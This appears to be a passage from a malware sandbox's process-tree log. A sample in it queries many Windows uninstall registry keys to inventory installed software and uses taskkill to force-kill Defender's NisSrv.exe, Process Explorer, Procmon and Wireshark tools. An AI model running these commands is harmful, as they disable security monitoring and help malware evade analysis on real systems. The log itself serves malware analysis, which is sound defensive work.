C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵PID:3516
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3964
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:4000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:496
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:3836
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:4004
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:3784
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:3848
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:2976
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2300
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵PID:3048
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵PID:3516
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:496
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵PID:488
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵PID:2040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3700
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵PID:4004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵PID:2040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2152
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵PID:3516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵PID:4116
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:4128
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4188
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:4236
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:4256
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4276
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:4312
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:4332
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4352
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:4388
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:4408
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4428
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:4464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:4484
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:4540
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:4560
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4580
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:4616
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:4636
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4656
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:4692
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:4712
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4732
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:4768
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:4788
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4808
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:4844
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:4864
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:4944
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:4980
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:4916
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:5052
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:5076
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5092
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵PID:4112
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵PID:4140
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵PID:4000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵PID:3704
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3336
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:3608
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:2772
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1372
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:3880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:3708
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1884
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:3700
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:3964
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:724
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2480
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:3380
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2416
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:4256
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:4396
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:4544
-